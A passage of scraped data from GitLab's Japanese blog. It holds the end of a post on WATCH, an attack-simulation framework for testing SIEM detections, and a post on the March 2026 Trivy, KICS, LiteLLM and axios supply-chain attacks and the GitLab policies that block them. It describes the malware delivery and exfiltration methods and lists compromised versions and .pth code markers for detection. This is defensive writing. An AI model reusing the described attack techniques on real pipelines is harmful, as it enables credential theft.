Duo](https://about.gitlab.com/ja-jp/gitlab-duo/)（GitLabのAIアシスタント）との相性を高めます。Duoにベースクラスと「特定のグループから大量のプロジェクトをクローンするテストを作って」「GraphQLを使ってこのプロジェクトのCI変数をすべて取得するテストを作って」「これらのプロジェクトを同じ命名規則にリネームして」といったプロンプトを与えると、Duoはフレームワークに直接プラグインできる動作するWATCHテストをスキャフォールドします。これにより、障壁がさらに下がります。エンジニアは「この検知をテストしたい」という考えから、Duoが実装作業の大半を担った状態で動作するテストまで、一気に進むことができます。\n\nPro Tip: GitLab Duoをさらに効果的に活用するために、私は[Duo Agent Skills](https://docs.gitlab.com/ja-jp/user/duo_agent_platform/customize/agent_skills/)を活用しました。これは、テストの作成のような定型作業の標準と手順を定義するのに最適です。プロジェクトディレクトリには`skills/WATCH-test-creator`というフォルダがあり、SKILL.mdに優れたテストの条件、使用できるヘルパー関数、プロジェクトの目的が記述されています。上記のようなプロンプトを入力した直後にこのファイルが読み込まれるため、Duoに対して「あなたが何をしているのか、どうやればいいのか」を毎回説明し直す必要がなくなります。何より重要なのは、結果が一貫して高品質になることです。以下はそのファイルの抜粋です。\n\n````text\n---\nname: WATCH-test-creator\ndescription: Create WATCH (Orchestrated Offensive Penetration Simulator) security detection tests that simulate malicious behavior on GitLab infrastructure to validate SIEM detection rules and alerting pipelines.\n---\n\n## WATCH Test Creator\n\nYou are an expert at writing security detection tests for the WATCH framework. WATCH tests simulate malicious activities on GitLab-owned infrastructure to verify that the SecOps security monitoring stack (Elastic SIEM, Tines SOAR, alerting rules) properly detects and responds to threats.\n\n### Architecture Overview\n```\nProject Root\n├── core/\n│   ├── base_test.py          # Abstract base class all tests inherit from\n│   ├── test_runner.py         # Auto-discovers and executes tests\n│   └── webhook_manager.py     # Tines/SOAR notification integration\n├── tests/\n│   ├── gitlab/                # GitLab-specific detection tests\n│   └── gcp/                   # GCP-specific detection tests\n├── utils/\n│   ├── gitlab_helper.py       # GitLab API wrapper (users, projects, tokens, webhooks, OAuth)\n│   └── crypto_utils.py        # Password generation utility\n├── config/\n│   ├── settings.py            # Config loader (reads YAML + GITLAB_ADMIN_PAT env var)\n│   └── environments/\n│       ├── dev.yaml           # Local GDK config\n│       └── prod.yaml          # Production staging.gitlab.com config\n├── main.py                    # Entry point with CLI args\n└── detection_status.json      # Test results and detection metadata\n```\n\n````\n\n## テストダッシュボードによる可視性の向上\n\n![テストダッシュボード](https://res.cloudinary.com/about-gitlab-com/image/upload/v1777574679/ylrc96iip682sinfg7zi.png)\n\nWATCHはまた、[GitLab Pages](https://docs.gitlab.com/ja-jp/user/project/pages/)を通じて2つのインタラクティブなダッシュボードをデプロイし、チームが検知の健全性をリアルタイムで把握できるようにしています。\n\n* **検知ステータスダッシュボード**は、すべての検知ルールと現在のテスト状況の概要を提供します。各検知の発火回数、現在の合否状態、検知のアクティブ期間といったメトリクスが含まれます。テーブルはフィルタリングとソートが可能で、エンジニアはどの検知に注意が必要かをすぐに特定できます。\n* **テスト実行ダッシュボード**は、テストIDごとにグループ化され、検知カバレッジの内訳を含む個々のテスト実行の詳細なビューを提供します。アラート伝播時間を示すタイムライン可視化も含まれており、テスト実行からアラート到着までの所要時間や、SIEMの対応するアラートへの直接リンクを確認できます。\n\nこれらのダッシュボードは、以前は手動でパイプラインログやSIEMクエリを掘り起こして検知の健全性を確認していた作業を置き換えました。\n\nGUARDの他の部分と同様に、WATCHはGitLabをそのプラットフォームとして全面的に活用しています。\n\n* **GitLab CI/CDパイプラインとスケジュールパイプライン**が、週次スケジューリングから実行、ダッシュボードのデプロイまで、テストライフサイクル全体をオーケストレーションします。\n* **パイプラインインプット**により、ステージを個別にトリガーできるため、すべてのテストを再実行することなく、検証ステップだけ、あるいはダッシュボード更新だけを実行することができます。\n* **CI/CD変数**が、TinesおよびGitLabステージング環境へのアクセスに必要なAPIキーを安全に保管します。\n* **GitLab Pages**が、追加のインフラ不要でWATCHダッシュボードをホストします。別途ホスティングの管理も、追加のデプロイツールも必要ありません。\n* テストはGitLabプロジェクト内のPythonファイルに過ぎないため、DaCを通じた検知ルールと同様に、**バージョン管理、マージリクエストレビュー、コードオーナーシップ**の恩恵を受けます。\n\n## WATCHでプロアクティブな姿勢を維持する\n\nWATCHを構築したことで、チームの検知品質に対する姿勢が事後対応型からプロアクティブ型へと変わりました。WATCH導入以前は、検知の不具合はインシデントが発生して期待されるアラートが届かないときに初めて露見していました。これは、ギャップを発見するには最悪のタイミングです。今では検知の健全性について定期的な更新を受け取ることができ、実際に何かが起きる*前*に不具合を把握できます。新たな検知を開発しても、それが壊れたまま放置されることはないという安心感が生まれました。\n\nWATCHのもうひとつのメリットは、レッドチームがフラッシュオペレーションを実施した際に使用した戦術・技術・手順（TTP）を記録できることです。検知を実装してペンテスト作業の事後分析を行った後、WATCHを使ってそれらの検知を検証するためにTTPを再実行することができます。本質的に、WATCHは検知のアトミックテストを再実行可能なTTPにします。\n\n## WATCHを試す\n\nSOCを運営しSIEMの検知を頼りに脅威を捕捉しているなら、問うべきは「検知が壊れるかどうか」ではなく、「壊れたときに気づけるかどうか」です。この問いに答えるために商用BASプラットフォームは必要ありません。サンドボックス環境、CI/CDパイプライン、そして攻撃シミュレーションをスクリプト化するためのフレームワークがあれば、大きく前進できます。\n\n[GitLab Ultimateの無料トライアル](https://about.gitlab.com/ja-jp/free-trial/)に登録して、独自の検知テストフレームワークを構築してみてください。",[740],"Evan Baltman","2026-05-01","2026-04-30","GitLab CI/CDとDuoで自動検知テストフレームワークを構築する",[24,25,745],"features","GitLabのSignals Engineeringチームが構築したWATCHフレームワークを通じて、セキュリティ監視パイプラインを継続的に検証する方法をご紹介します。",{"featured":15,"template":16,"slug":748},"automated-detection-testing-framework",{"content":750,"config":762},{"heroImage":751,"body":752,"authors":753,"updatedDate":755,"date":756,"title":757,"tags":758,"description":761,"category":13},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png","***注：GitLab製品は、本記事で言及されている侵害されたパッケージバージョンを使用していませんでした。***\n\nわずか12日間で4件の独立したサプライチェーン攻撃が発生し、継続的インテグレーション／継続的デリバリー（CI/CD）パイプラインが高度な脅威アクターにとって格好の標的となっていることが明らかになりました。\n\n2026年3月19日から31日にかけて、脅威アクターは以下のツールを侵害しました。\n\n* オープンソースのセキュリティスキャナー（Trivy）\n* Infrastructure as Code（IaC）セキュリティスキャナー（Checkmarx KICS）\n* AIモデルゲートウェイ（LiteLLM）\n* JavaScript HTTPクライアント（axios）\n\nいずれの攻撃も同じ侵入口を狙っていました。それがビルドパイプラインです。\n本記事では、何が起きたのか、なぜパイプラインが特に脆弱なのか、そしてGitLabの集中型ポリシー適用（以下で定義するポリシーを使用）が、これらの攻撃パターンを本番環境に到達する前にブロック・検出・封じ込める方法を解説します。\n\n## 数百万人が信頼するツールが、わずか数分で侵害された\n\nサプライチェーン攻撃のタイムラインは以下のとおりです。\n\n### 3月19日：Trivyセキュリティスキャナーが攻撃のベクターに\n\n[Trivy](https://github.com/aquasecurity/trivy)は、世界で最も広く使われているオープンソースの脆弱性スキャナーの1つです。脆弱性を検出するために*パイプライン内*で実行されるツールです。\n\n3月19日、TeamPCPと呼ばれる脅威アクターグループが[侵害された認証情報を使用し](https://www.aquasec.com/blog/trivy-supply-chain-attack-what-you-need-to-know/)、`aquasecurity/trivy-action` GitHub Actionの76バージョンタグ（全77件中）および`aquasecurity/setup-trivy`の全7タグに悪意のあるコードをforce-pushしました。同時に、トロイの木馬化されたTrivyバイナリ（v0.69.4）が公式配布チャネルに公開されました。このペイロードは認証情報を窃取するマルウェアで、Trivyスキャンを実行したすべてのパイプラインから環境変数、クラウドトークン、SSHキー、CI/CDシークレットを収集しました。\n\nこのインシデントには[CVE-2026-33634](https://nvd.nist.gov/vuln/detail/CVE-2026-33634)が割り当てられ、CVSSスコアは9.4でした。米国サイバーセキュリティ・インフラストラクチャセキュリティ庁（CISA）は数日以内にこれを既知の悪用済み脆弱性カタログに追加しました。\n\n### 3月23日：次はCheckmarx KICSが標的に\n\nTeamPCPは窃取した認証情報を使い、CheckmarxのオープンソースプロジェクトであるKICS（Keeping Infrastructure as Code Secure）に攻撃対象を移しました。`ast-github-action`および`kics-github-action` GitHub Actionに[同じ認証情報窃取マルウェアを注入し](https://thehackernews.com/2026/03/teampcp-hacks-checkmarx-github-actions.html)、3月23日の12:58〜16:50 UTCの間、これらのアクションを参照するCI/CDパイプラインはすべて、APIキー、データベースパスワード、クラウドアクセストークン、SSHキー、サービスアカウントの認証情報などの機密データを密かに外部に送信していました。\n\n### 3月24日：Trivyの侵害された認証情報を経由してLiteLLMも被害を受ける\n\n月間9,500万ダウンロードのLLM APIプロキシであるLiteLLMが次の標的になりました。TeamPCPは、TrivyでスキャンしていたLiteLLM自身のCI/CDパイプラインから収集した認証情報を使用し、PyPIにバックドアを仕込んだバージョン（1.82.7および1.82.8）を[公開しました](https://thehackernews.com/2026/03/teampcp-backdoors-litellm-versions.html)。\n\nバージョン1.82.7を標的としたマルウェアは、`litellm/proxy/proxy_server.py`にインポート時に実行されるbase64エンコードされたペイロードを直接注入していました。バージョン1.82.8を標的としたものは、Pythonインタープリタ起動時に自動実行される`.pth`ファイルを使用していました。LiteLLMをインストールするだけでペイロードが起動してしまう仕組みです。攻撃者は窃取したデータ（SSHキー、クラウドトークン、.envファイル、暗号資産ウォレット）を暗号化し、本物のドメインに似せた`models.litellm.cloud`に外部送信しました。\n\n### 3月31日：単純なパッケージングミスがAIコーディングアシスタントのソースコードを流出させる\n\nTeamPCPの攻撃キャンペーンがまだ続く中、あるソフトウェア企業が59.8 MBのソースマップファイルを含むnpmパッケージを公開してしまいました。そのファイルには、AIコーディングアシスタントの完全な未縮小TypeScriptソースコードへの参照が含まれており、自社のCloudflare R2バケットでホストされていました。\n\nこの流出により、1,900のTypeScriptファイル、512,000行以上のコード、44の隠し機能フラグ、未公開のモデルコードネーム、そして知る人ぞ知る場所へのアクセス方法を知っていれば誰でも確認できるシステムプロンプトの全文が公開されてしまいました。エンジニアの[Gabriel Anhaia氏が解説したように](https://dev.to/gabrielanhaia/claude-codes-entire-source-code-was-just-leaked-via-npm-source-maps-heres-whats-inside-cjo)、「`.npmignore`またはpackage.jsonのfilesフィールドの設定ミスが1つあるだけで、すべてが露出してしまいます」。\n\n### 3月31日：axiosとサプライチェーンへのもう1つのトロイの木馬\n\n同日、週間1億ダウンロード超のJavaScript HTTPクライアントであるaxios npmパッケージを狙った[高度なキャンペーンが実行されました](https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html)。\n\n侵害されたメンテナーアカウントによりバックドアを仕込んだバージョン（1.14.1および0.30.4）が公開されました。悪意のある依存関係（`plain-crypto-js@4.2.1`）が注入され、macOS、Windows、Linuxで動作するリモートアクセス型トロイの木馬（RAT）がデプロイされました。2つのリリースブランチともに39分以内に感染し、マルウェアは実行後に自己消去するよう設計されていました。\n\n## これらの攻撃に潜む共通パターン\n\n5件のインシデントを通じて、3つの明確な攻撃パターンが浮かび上がってきます。いずれもCI/CDパイプラインがその入力に対して暗黙的に持つ信頼を悪用するものです。\n\n### パターン1：汚染されたツールとアクション\n\nTeamPCPのキャンペーンは、ある根本的な前提を突いていました。それは、パイプライン*内*で実行されるセキュリティツール自体は信頼できるという思い込みです。GitHubアクションのタグやPyPIパッケージのバージョンが悪意のあるコードに解決された場合、パイプラインはそれを環境シークレット、クラウド認証情報、デプロイトークンへのフルアクセス権限で実行してしまいます。パイプラインはタグを信頼するため、検証ステップが存在しないのです。\n\n**推奨されるパイプラインレベルの対策：** 可変バージョンタグではなく、不変の参照（コミットSHAまたはイメージダイジェスト）にツールとアクションをピン留めしてください。ピン留めが現実的でない場合は、既知の正常なチェックサムまたは署名に対してツールと依存関係の整合性を検証してください。検証に失敗した場合は実行をブロックします。\n\n### パターン2：知的財産（IP）を漏洩するパッケージング設定ミス\n\n設定ミスのあるビルドパイプラインが、デバッグ成果物をそのまま本番パッケージに含めて出荷してしまいました。`.npmignore`またはpackage.jsonのfilesフィールドの設定ミスが1つあれば十分です。公開前の検証ステップを設けておけば、こうした問題は毎回防ぐことができます。\n\n**推奨されるパイプラインレベルの対策：** パッケージを公開する前に、パッケージの内容を許可リストに対して検証し、予期しないファイル（ソースマップ、内部設定ファイル、.envファイル）をフラグとして検出し、チェックに失敗した場合は公開ステップをブロックする自動チェックを実行してください。\n\n### パターン3：推移的依存関係の脆弱性\n\naxiosへの攻撃は、axiosを直接使用しているユーザーだけでなく、依存関係ツリーが侵害されたバージョンに解決されるすべてのユーザーを標的にしました。ロックファイル内で一度依存関係が汚染されると、組織全体のビルドインフラに波及する可能性があります。\n\n**推奨されるパイプラインレベルの対策：** 依存関係のチェックサムを既知の正常なロックファイルの状態と比較してください。予期しない新しい依存関係やバージョン変更を検出し、未検証のパッケージを導入するビルドをブロックします。\n\n## GitLabパイプライン実行ポリシーによる各攻撃パターンへの対処\n\nGitLabパイプライン実行ポリシー（[PEP](https://docs.gitlab.com/ja-jp/user/application_security/policies/pipeline_execution_policies/)）は、セキュリティチームおよびプラットフォームチームが、開発者が`.gitlab-ci.yml`で定義した内容に関わらず、組織全体のすべてのパイプラインに必須のCI/CDジョブを注入できる仕組みです。PEPで定義されたジョブは、`[skip ci]`や`[no_pipeline]`ディレクティブを使ってもスキップできません。ジョブは開発者のパイプラインを前後から挟む*予約済み*ステージ（`.pipeline-policy-pre`および`.pipeline-policy-post`）で実行できます。\n\n3つのパターンすべてに対応するパイプライン実行ポリシーをオープンソースプロジェクトとして公開しています：[Supply Chain Policies](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies)。これらのポリシーは独立してデプロイ可能で、それぞれテスト用の違反サンプルが同梱されています。各ポリシーの仕組みをご紹介します。\n\n### ユースケース1：パッケージ公開時の意図しない情報露出を防ぐ\n\n**問題：** ビルドパイプラインが公開時の検証をスキップしたため、ソースマップファイルがAIコーディングツールのnpmパッケージに含まれてしまいました。\n\n**PEPによるアプローチ：** この種のエラーに特化したオープンソースのパイプライン実行ポリシーを作成しました：[Artifact Hygiene](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/artifact-hygiene.gitlab-ci.yml?ref_type=heads)。\n\nこのポリシーは、公開ステップが実行される前に、アーティファクトタイプ（npmパッケージ、Dockerイメージ、またはHelmチャート）を自動検出してその内容を検査する`.pipeline-policy-pre`ジョブを注入します。npmパッケージに対しては、3つのチェックを実行します。\n\n1. **ファイルパターンのブロックリスト。** npm packの出力をスキャンし、ソースマップ（.map）、テストディレクトリ、ビルド設定、IDE設定、src/ディレクトリを検出します。\n2. **パッケージサイズゲート。** AIツールを流出させた59.8 MBパッケージのように、50 MBを超えるパッケージをブロックします。\n3. **sourceMappingURLスキャン。** 外部URL（大手AI企業のソースコードを露出させたR2バケットのパターン）、インラインのdata: URI、JavaScriptバンドルに埋め込まれたローカルファイル参照を検出します。\n\n違反が検出されると、パイプラインは失敗したCIジョブのログに明確なレポートを出力して終了します。\n\n```text\n=============================================\nFAILED: 3 violation(s) found\n=============================================\nBLOCKED: dist/index.js.map (matched: \\.map$)\nBLOCKED: dist/index.js contains external sourceMappingURL\nBLOCKED: dist/utils.js contains inline sourceMappingURL\n\nThis check is enforced by a Pipeline Execution Policy. If this is a false positive, contact the security team to update the policy project or exclude this project.\n```\n\nこのポリシーには、ユーザーが設定できるCI変数はありません。開発者が無効化したり回避したりすることはできません。例外はポリシーレベルでセキュリティチームが管理するため、意図的なプロセスと明確な監査証跡が確保されます。\n\nリポジトリには意図的な違反を含むテストプロジェクト（examples/leaky-npm-package/）が含まれており、組織にデプロイする前にポリシーの動作を確認できます。[README](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/README.md)には、セットアップとデプロイの完全なクイックスタートガイドが含まれています。\n\n**検出できる問題：** これらのコントロールのどれか1つでもあれば、AI企業のソースコード流出は防げていた可能性があります。\n\n* ソースマップファイルはファイルパターンのブロックリストに引っかかります。\n* 59.8 MBというサイズはサイズゲートに引っかかります。\n* 外部R2バケットを指すsourceMappingURLはURLスキャンに引っかかります。\n\n### ユースケース2：依存関係の改ざんとロックファイル操作を検出する\n\n**問題：** axiosへの攻撃では、インストール時にRATを実行する悪意のある推移的依存関係（`plain-crypto-js`）が導入されました。侵害が行われた期間中にnpm installを実行したすべての人がトロイの木馬を取り込んでしまいました。\n\n**PEPによるアプローチ：** [Dependency Integrityポリシー](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/dependency-integrity.gitlab-ci.yml)は、パッケージエコシステム（npmまたはPython）を自動検出し、3つのチェックを実行する.pipeline-policy-preジョブを注入します。\n\n**npmプロジェクトの場合**（`package-lock.json`、`yarn.lock`、または`pnpm-lock.yaml`によってトリガー）：\n\n1. **ロックファイルの整合性。** `npm ci --ignore-scripts`を実行します。`node_modules`の内容がロックファイルの指定と異なる場合、失敗します。これにより、package.jsonは更新されたがロックファイルが再生成されていないケースを検出し、SRIインテグリティハッシュも検証します。\n2. **ブロックパッケージスキャン。** ロックファイルの完全な依存関係ツリーを、侵害が確認済みのパッケージバージョンのGitLab管理リストである`blocked-packages.yml`と照合します。同梱のブロックリストには`axios@1.14.1`、`axios@0.30.4`、`plain-crypto-js@4.2.1`が含まれています。\n3. **未宣言の依存関係の検出。** インストール後、node_modulesの内容をロックファイルと比較します。ディスク上に存在するがロックファイルに存在しないパッケージは改ざんの証拠です（例：追加パッケージを取得する侵害されたpostinstallスクリプト）。\n\n**Pythonプロジェクトの場合**（`requirements.txt`、`Pipfile.lock`、`poetry.lock`、または`uv.lock`によってトリガー）：\n\n1. **ロックファイルの整合性。** 分離された仮想環境にインストールし、ロックファイルからのインストールが成功することを確認します。\n2. **ブロックパッケージスキャン。** 同じブロックリストのアプローチです。同梱リストには`litellm==1.82.7`および`litellm==1.82.8`が含まれています。\n3. **.pthファイルの検出。** site-packagesの`.pth`ファイルをスキャンし、実行可能なコードパターン（`import os`、`exec(`、`eval(`、`__import__`、`subprocess`、`socket`）を検出します。これはLiteLLMバックドアが使用したまさにその仕組みです。\n\n違反が検出されると：\n\n```text\n=============================================\nFAILED: 1 violation(s) found\n=============================================\nBLOCKED: axios@1.14.1 is a known-compromised package\n\nThis check is enforced by a Pipeline Execution Policy.\n```\n\nこのポリシーは*ストリクトモード*で動作します。コミット済みのロックファイルに存在しない依存関係は、パイプラインをブロックします。開発者が依存関係を追加する必要がある場合は、更新されたロックファイルをコミットします。ポリシーはインストールされたバージョンがコミットされたバージョンと一致することを確認します。コミットされていないものが現れた場合（例：侵害されたアップストリームパッケージ経由で注入された推移的依存関係）、パイプラインはブロックされます。\n\n**検出できる問題：** `plain-crypto-js`という新規かつ未確認の依存関係の導入は、未宣言の依存関係チェックによってフラグが立てられます。`axios@1.14.1`バージョンはブロックパッケージスキャンによって検出されます。LiteLLMの`.pth`ファイルは`.pth`検出チェックによって検出されます。各攻撃に対して、少なくとも1つ、多くの場合は2つの独立した検出シグナルがあります。\n\n### ユースケース3：侵害されたツールを実行前に検出・ブロックする\n\n**問題：** TeamPCPは、信頼できるTrivyとCheckmarxのGitHubアクションタグを悪意のあるバージョンに置き換えました。これらのタグを参照するパイプラインはすべて、認証情報を窃取するマルウェアを実行してしまいました。\n\n**PEPによるアプローチ：** [Tool Integrityポリシー](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/tool-integrity.gitlab-ci.yml)は、GitLab CI Lint API（またはフォールバックとして`.gitlab-ci.yml`を評価する仕組み）にクエリを発行し、コンテナイメージの参照を抽出して、セキュリティチームが管理する承認済みイメージ許可リストと照合する`.pipeline-policy-pre`ジョブを注入します。\n\n許可リスト（`approved-images.yml`）は、イメージごとに3つの制御をサポートしています。\n\n**承認済みリポジトリ：** リスト上のリポジトリからのイメージのみが許可されます。未知のリポジトリはパイプラインをブロックします。\n\n**許可されているタグ：** 承認済みリポジトリ内でも、特定のタグのみが許可されます。これにより、未テストバージョンへの移行を防ぎます。\n\n**ブロックされているタグ：** リポジトリが承認済みであっても、既知の侵害バージョンを明示的にブロックできます。同梱の許可リストは、TeamPCPがトロイの木馬化した正確なバージョンである`aquasec/trivy:0.69.4`から`0.69.6`をブロックします。\n\n違反が検出されると、他のジョブが実行される前にパイプラインが失敗します。\n\n```text\n=============================================\nFAILED: 1 violation(s) found\n=============================================\nBLOCKED: aquasec/trivy:0.69.4 (job: trivy-scan)\n\n - tag '0.69.4' is known-compromised\n\nThis check is enforced by a Pipeline Execution Policy.\n```\n\n許可リストは、ポリシープロジェクトに対するMRを通じて管理されます。新しい承認済みイメージを追加するには、セキュリティチームがMRを開きます。新たな侵害への対応には、ブロックするタグを追加するだけです。コードの変更は不要で、YAMLだけで管理できます。\n\n**検出できる問題：** 未承認のタグを持つイメージが検出されると、ポリシーはイメージのリポジトリ名とタグを許可リストと照合します。一致しない場合、スキャナーが実行される前にパイプラインをブロックし、認証情報の外部送信を防ぎます。\n\n*注：上記のサンプルを拡張することで、PEPをタグではなくダイジェストへのピン留めを強制するために使用できます。これはforce pushに対して耐性があります。このサンプルは、より基本的なタグベースの適用パターンを示しています。*\n\n## PEPを超えて：GitLabのサプライチェーン防御\n\nパイプライン実行ポリシーは適用のレイヤーですが、サプライチェーン保護において多層防御（defense-in-depth）戦略の一部として機能するときに最大の効果を発揮します。GitLabは、サプライチェーン保護においてPEPを補完するいくつかの機能を提供しています。\n\n### シークレット検出\n\n[GitLabのシークレット検出](https://docs.gitlab.com/ja-jp/user/application_security/secret_detection/)は、認証情報がそもそもリポジトリに入り込むことを防ぎ、侵害されたパイプラインツールが収集できる情報を大幅に削減します。2026年3月の攻撃の文脈では：\n\n* リポジトリに保存された認証情報は、攻撃者にとって発見しやすく、ローテーションも遅くなります。Trivyのインシデントでは、ローテーションプロセス自体も悪用されました。Aqua Securityのローテーションはアトミックではなく、攻撃者は古いトークンが完全に失効する前に新たに発行されたトークンを取得しました。GitLabのシークレット検出には、漏洩したGitLabトークンの自動失効機能と、サードパーティプロバイダーへの認証情報失効通知を行うパートナーAPIが含まれており、侵害発生時の対応を迅速化します。\n* シークレット検出と適切なシークレット管理（短命トークン、Vault基盤の認証情報、パイプラインシークレットへの最小限の露出）を組み合わせることで、信頼済みツールが悪意を持つ動作をした場合でも、攻撃者がアクセスできる範囲を制限します。\n\n### ソフトウェアコンポジション解析（SCA）による依存関係スキャン\n\nGitLabの[依存関係スキャン](https://docs.gitlab.com/ja-jp/user/application_security/dependency_scanning/)は、ロックファイルとマニフェストを解析することで、プロジェクトの依存関係における既知の脆弱性を特定します。2026年3月の攻撃の文脈では：\n\n* LiteLLMについては、侵害されたバージョン（1.82.7、1.82.8）がGitLabのアドバイザリデータベースで追跡されており、影響を受けるPythonプロジェクトに自動的にフラグを立てます。\n* axiosについては、依存関係スキャンが組織内のすべてのプロジェクトで侵害されたバージョン（1.14.1、0.30.4）を特定し、セキュリティチームに影響範囲の評価と認証情報ローテーションの優先順位付けのための一元的なビューを提供します。\n* 同様に、TeamPCPのCanisterWorm伝播によって侵害されたすべてのnpmパッケージも、使用されている場合はフラグが立てられます。\n\n[GitLabコンテナスキャン](https://docs.gitlab.com/ja-jp/user/application_security/container_scanning/)は、デプロイメントで使用される脆弱なコンテナイメージを検出します。Trivyの侵害については、コンテナスキャンがコンテナレジストリまたはデプロイメントマニフェストに現れたトロイの木馬化されたTrivyのDockerイメージ（0.69.4〜0.69.6）にフラグを立てます。\n\n### マージリクエスト承認ポリシー\n\n[マージリクエスト承認ポリシー](https://docs.gitlab.com/ja-jp/user/application_security/policies/merge_request_approval_policies/)は、依存関係のロックファイルやCI/CD設定への変更がマージされる前にセキュリティチームの承認を必須とすることができます。これにより、サプライチェーン攻撃が一般的に導入する種類の変更に対して、人間によるチェックポイントが確保されます。\n\n### 近日公開予定：依存関係ファイアウォール、アーティファクトレジストリ、SLSAレベル3の認証と検証\n\n今後予定されているGitLabのサプライチェーンセキュリティ機能は、レジストリとパイプラインという2つの重要なコントロールポイントにおけるポリシー適用を強化します。依存関係ファイアウォールとアーティファクトレジストリは非準拠のパッケージをブロックし、SLSAレベル3の認証によってアーティファクトが承認されたパイプラインで生成され、改ざんされていないという暗号学的な証明が提供されます。これらを組み合わせることで、セキュリティチームはソフトウェアサプライチェーンへの入出力を検証可能な形で管理できるようになります。\n\n## あなたの組織にとっての意味\n\nAI支援型の脅威が高まる中、CI/CDパイプラインへの攻撃はますます一般的になっています。TeamPCPのキャンペーンは、1つの侵害された認証情報が信頼済みツールのエコシステム全体にどう波及するかを示しています。\n\n影響を受けたコンポーネントを使用していた場合は、すべてのパイプラインシークレットが露出したという前提で行動してください。直ちにローテーションし、永続的なバックドアがないかシステムを監査してください。いずれの場合も、認証情報を定期的にローテーションし、短命トークンを使用することで、将来の侵害のブラスト半径を制限できます。\n\n推奨事項をまとめます：\n\n1. **可能な限り、依存関係をチェックサムにピン留めしてください。** TeamPCPが悪用した可変バージョンタグは、セキュリティ境界ではありません。すべての[CI/CDコンポーネント](https://docs.gitlab.com/ja-jp/ci/components/#manage-dependencies)、アクション、コンテナイメージにはSHAピン留め参照を使用してください。\n2. **実行前の整合性チェックを実行してください。** パイプライン実行ポリシーを使用して、パイプラインジョブが実行される*前*にツールと依存関係の整合性を確認してください。これが`.pipeline-policy-pre`ステージです。\n3. **公開するものを監査してください。** すべてのパッケージ公開ステップには、アーティファクトの内容を自動検証する処理を含めてください。ソースマップ、環境ファイル、内部設定はビルド環境から外部に出すべきではありません。[Supply Chain Policy](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies)プロジェクトは、npm、Docker、Helmアーティファクトのすぐにデプロイできる出発点を提供しています。\n4. **依存関係のドリフトを検出してください。** すべてのパイプライン実行において、依存関係の解決結果をコミット済みロックファイルと比較してください。予期しない新しい依存関係を監視します。\n5. **ポリシー管理を集中化してください。** セキュリティチェックを含めることを開発者の記憶に頼らないでください。開発者が削除やスキップをできないポリシーを通じて、グループまたはインスタンスレベルで適用してください。\n6. **セキュリティツール自体が標的になると想定してください。** 脆弱性スキャナー、静的アプリケーションセキュリティテスト（SAST）ツール、AIゲートウェイは侵害される可能性があります。各ツールの権限は最低限必要なものに限定し、その他へのアクセスが不可能であることを確認してください。\n\n## GitLabでパイプラインを保護する\n\n2週間にわたり、攻撃者はソフトウェア開発エコシステムで最も広く採用されているツールの一部を使用している組織の本番パイプラインを侵害しました。\n\n教訓は明確です。ビルドパイプラインには、ネットワークやクラウドインフラに適用するのと同じレベルの集中管理されたポリシー駆動の保護が必要です。\n\nGitLabパイプライン実行ポリシーは、その適用レイヤーを提供します。個々のプロジェクト設定に関わらず、すべてのプロジェクトのすべてのパイプラインでセキュリティチェックが実行されることを保証します。依存関係スキャン、シークレット検出、マージリクエスト承認ポリシーと組み合わせることで、2026年3月に見られたクラスの攻撃をブロック、検出、封じ込めることができます。\n\n[Supply Chain Policies](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies)プロジェクトは、大手AI企業の流出事故の背後にある種類のエラーを正確に検出する、動作するパイプライン実行ポリシーを提供しています。npmパッケージ、Dockerイメージ、Helmチャートに対応しています。クローンして、グループにデプロイし、今後のサプライチェーン攻撃に備えてすべてのパイプラインを準備してください。\n\n集中管理されたパイプラインポリシーを始めるには、[GitLab Ultimateの無料トライアル](https://about.gitlab.com/ja-jp/free-trial/devsecops/)にサインアップしてください。\n\n*このブログ記事には、1933年証券法第27A条（改正済み）および1934年証券取引法第21E条の意味における「将来の見通しに関する記述」が含まれています。これらの記述に反映された予想は合理的であると信じておりますが、実際の結果や成果を大幅に異なるものにする可能性のある既知および未知のリスク、不確実性、前提条件、その他の要素の影響を受けることがあります。これらのリスクおよびその他の要素に関するさらなる情報は、SECへの提出書類の「リスク要因」という見出しの下に記載されています。法律で要求される場合を除き、このブログ投稿の日付以降にこれらの記述を更新または修正する義務を負いません。*",[754],"Grant Hickman","2026-04-10","2026-04-07","3月のサプライチェーン攻撃から学ぶパイプラインセキュリティ",[24,759,760,745],"product","tutorial","2026年3月、Trivy・Checkmarx KICS・LiteLLM・axiosが次々と侵害されました。GitLabの集中管理されたパイプライン実行ポリシーが、これらのサプライチェーン攻撃パターンをどのように検出・ブロックできるかをご紹介します。",{"featured":34,"template":16,"slug":763},"pipeline-security-lessons-from-march-supply-chain-incidents",{"promotions":765},[766,780,791,802],{"id":767,"categories":768,"header":770,"text":771,"button":772,"image":777},"ai-modernization",[769],"ai-ml","Is AI achieving its promise at scale?","Quiz will take 5 minutes or less",{"text":773,"config":774},"Get your AI maturity score",{"href":775,"dataGaName":776,"dataGaLocation":254},"/assessments/ai-modernization-assessment/","modernization assessment",{"config":778},{"src":779},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":781,"categories":782,"header":783,"text":771,"button":784,"image":788},"devops-modernization",[759,579],"Are you just managing tools or shipping innovation?",{"text":785,"config":786},"Get your DevOps maturity score",{"href":787,"dataGaName":776,"dataGaLocation":254},"/assessments/devops-modernization-assessment/",{"config":789},{"src":790},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":792,"categories":793,"header":794,"text":771,"button":795,"image":799},"security-modernization",[24],"Are you trading speed for security?",{"text":796,"config":797},"Get your security maturity 